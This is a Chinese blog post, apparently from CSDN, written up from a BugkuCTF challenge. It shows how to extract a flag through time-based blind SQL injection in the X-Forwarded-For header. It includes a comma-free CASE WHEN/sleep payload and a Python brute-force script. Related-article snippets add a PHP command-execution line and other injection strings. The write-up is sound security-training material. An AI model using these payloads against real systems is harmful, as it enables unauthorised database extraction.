[CTF]SQL基于时间的盲注(BUGKUCTF)

最新推荐文章于 2024-03-29 17:36:18 发布
最新推荐文章于 2024-03-29 17:36:18 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: WEB安全 文章标签: sql盲注 BUGKUCTF 基于时间
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/V1040375575/article/details/84536900
版权

这篇只是为了让我自己做个记录

在进行一个BUGKU的ctf:http://123.206.87.240:8002/web15/
题目给出了源码:

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

1、首先访问一下,看到就是源码里的功能,从header中获取你的ip
在这里插入图片描述
2、看看代码
$sql=“insert into client_ip (ip) values (’$ip’)”;

将ip插入到数据库中。
$ip_arr = explode(’,’, $ip);

这里已经把逗号去掉了。所以之后的利用不能使用逗号。
substr(,,) 这个不行了
这里用case when then else end。

思路:然后我们可以将values中的ip先闭合,然后执行其他代码。
先预测一波flag在flag表中的flag字段中。猜flag的长度。

利用:
1’ and (case when (length((select group_concat(flag) from flag))=32) then sleep(3) else 1 end))#
如果延迟了3秒后才刷新出网页说明长度正确。这里可以用python直接跑一下。
在这里插入图片描述
这里直接用burpsuit得出为32.,然后接下来用python跑一下flag吧。

import requests

if __name__ == '__main__':
    url = "http://123.206.87.240:8002/web15/"
    data = "1' and (case when (substr((select group_concat(flag) from flag) from {0} for 1)='{1}') then sleep(3) else 1 end))#"
    #data_cd =   "1' and (case when ((select length(flag) from flag)={0}) then sleep(3) else 1 end))#" 爆长度
    flag = ""
    for i in range(1,32):
        for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.":
            try:
                header = {'X-Forwarded-For': data.format(str(i),str1)}
                requests.get(url, headers=header, timeout=2)
            except requests.exceptions.ReadTimeout:
                flag += str1
                print flag
                break

    print "flag{"+flag+"}"

成功得出结果。

by pandar

pandarking
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSQL盲注.py
11-25
CTF解题中有时会用到盲注,这是一段SQL盲注代码,运行于python37环境,多个字段信息提取的句子已注释保存。
CTF_流量日志分析】二分法盲注分析
serendipity1130的博客
10-16 1652
1.打开日志文件发现又是一道二分法盲注流量,观察任意几条: 分析过程: 当状态码位200的时候,表示正确,报错为404,所以第21位大于101正确,大于102报错,所以正确字符为101,所以盲注出来的字符串应该是状态码等于200时的字符或等于404时的ascii码减去1 2.根据以上分析写出脚本: import urllib.parse import requests,re f = open('日志里的秘密.log','r',encoding='gb18030',errors='ignore
时间盲注ctfhub)
最新发布
2401_82985722的博客
03-29 873
(布尔盲注直接使用length进行筛选:按照length从高到低排序 前面四个即为结果,按照payload1的顺序进行排序得到数据库名sqli。(已经知道长度为4,可以直接设置为4,不知道时 设置比需要爆破字符的长度长。(5)点击开始攻击得到结果,sleep(5)要筛选出响应时间大于5s的数据包。condition为条件,条件为真时返回true,条件为假时返回false。再进行筛选,响应时间最大的四个就是执行成功的——sqli。# -D 指定库,-T指定表,-C 指定列(字段)(爆破字段为26个英文字母)
[虎符ctf2021]你会日志文件分析吗
CSDN12333221的博客
11-07 307
拿到一份日志,毫无头绪,上网查wp得知为sql盲注,得再学。如果正确会休眠两秒,那么就找到377长度的请求。1.看时间和后门的长度。找出所有的Ascii码。
安恒 6月月赛 简单的日志分析、又是crackme和你认识我吗?
A_dmin的博客
06-29 1591
安恒 6月月赛 简单的日志分析、又是crackme和你认识我吗? 一天一道CTF题目,能多不能少 0x001 Misc 简单的日志分析 题目链接: 链接:https://pan.baidu.com/s/1xxiCe_oTRcoIN-eFEfmTSg 提取码:7j26 复制这段内容后打开百度网盘手机App,操作更方便哦 解压打开,日志文件分析,发现是对一个网站的盲注的日志, 然后就开始寻找flag,...
CTF 入坑新生赛 Misc 流量分析1 (SQL盲注的分析)
Landasika的博客
11-01 3644
本人小白入门,不到之处请大侠指点!!! 解题预备知识 wireshark的使用、SQL盲注基本原理 大佬的一片关于流量分析SQL盲注的题解: 某行业攻防培训-----流量分析之-----sql盲注_qwsn-CSDN博客 关于SQL盲注的原理: SQL盲注(原理概述、分类)_小赵同学的博客-CSDN博客_sql盲注原理 解题思路 用wireshark打开文件,观察后可以发现,这个是一个SQL盲注的流量分析题。 ​​ 根据SQL盲注的原理,我们直接搜索1,1 2,1 ...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
ctf 一题日志审计题
为之的博客
07-16 4754
打开日志看下,前面看不出什么,但是最后面就很明显,url解码后是sq盲注 这是按照一般流程去盲注找出数据库、表、字段及它们的长度。 所以直接跳过 直到这附近, 随便打开一个解码 3' OR NOT ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM flag.flag),1,1))>48# 这是对flag的每个字符判断其ascii值,本来应该是通过响应状态码来判断是否成功,但是所有的状态码200,但是 ...
ctfsql注入——基于时间盲注
wlllllianqing的博客
09-18 742
基于时间盲注 原理:利用sleep()或benchmark()等函数让mysql执行时间变长,并结合判断条件if(expr1,expr2,expr3),然后通过页面的响应时间长短来判断语句返回的值是TRUE还是False,从而猜解一些未知的字段。 函数sleep(duration): 睡眠(暂停)时间为duration参数给定的秒数,然后返回0。若sleep()被中断,它会返回1。 select * from table where id=1 and sleep(3); select * from tab
[BUUCTF]第四天训练日志
Y1seco的博客
08-04 200
web [网鼎杯2018]Unfinish
一次线上ctf的日志分析(sql注入),网络协议分析,内存取证
weixin_50464560的博客
09-16 3909
拿到的是两个东西 我们先看secret.log 很多乱码但是有一串16进制数 把这段复制下来,我们放到HxD看 点击新建,直接粘贴 发现不对,观察头部,发现少了一个数(5) 因为加上5就是一个rar头部 即 导出来,改成ya.rar 要密码 我们看password.pcapng 输入过滤找post 有些很奇怪的东西 查询后知道这是jsfuck加密,具体看这里:https://blog.csdn.net/weixin_50464560/article/details/1203..
CTF之misc-日志分析
热门推荐
Battery的博客
05-04 8万+
1、注入审计 出题人通常会使用sqlmap去跑一个注入点,跑出数据后将日志留存,让参 赛者判断sqlmap注出了什么数据,此数据通常就为flag。 2、命令执行审计 出题人通常会利用一句话木马,进行一系列敏感操作,或者假装一开始不知 道一句话木马的密码,从而进行一系列的爆破行为,让参赛者判断一句话木 马的密码。 ......
[pwnthebox] [scctf] 日志分析 apache2
0of_blog
05-24 422
附件:apache2.log 下载一看,一堆乱码,看样子是base64编码 写个python脚本解码一下 import base64 import re import urllib.parse logs = '' with open('D:\\download\\ctf\\Apache2-hard.log', 'r') as f: for line in f.readlines(): re_b64 = base64.b64decode(line.encode()).de
ctfshow web(日志注入&简单回显盲注&&with rollup注入绕过)
weixin_63231007的博客
05-25 964
web3 <?php include($_GET['url']);?> php伪协议的标志。没有提示我们flag在哪个文件,filter试一下flag.php,flag,txt,flag都没有 用php://input试一下,burp抓包 发现了ctf_go_go_go,应该就是我们的flag文件。 post 传入 <?php system('cat ctf_go_go_go'); ?> cat一下,得到flag。 web4 include()函数包含的文件会被
CTF-时间盲注专题
PolarPeak的博客
04-25 2483
文章目录参考时间盲注Heavy QueryGet_lock()Rlikesleep2019hgame-week3-sqli2 `sleep`benchmark题pwnhub全宇宙最最简单的PHP博客系统 `Get_lock() Heavy Query` 参考 时间盲注 Heavy Query 个人认为这个方法是本题的最优解 原理就如方法的名字:大负荷查询 即用到一些消耗资源的方式让数据库的查询时间尽量变长 而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积,这样就可以让数据库的查询慢下来 而最后找到系统
BUUCTF——[GXYCTF2019]BabySQli
Ho1aAs‘s Blog
05-27 1126
文章目录利用点解题分析完 利用点 SQL字符型注入 UNION SELECT联合查询特性 解题 search.php的注释发现hint <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--> 先base32再base64 select * from user where username = '$name' 明白了查询语句,先试试admi
ctfhub布尔盲注
08-31
CTF比赛中,也经常会涉及到布尔盲注的题目。 布尔盲注是通过构造恶意的输入来判断应用程序是否存在漏洞。它的原理是利用应用程序对输入的处理方式,通过观察应用程序在不同输入情况下的响应,来推断出隐藏在后台...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值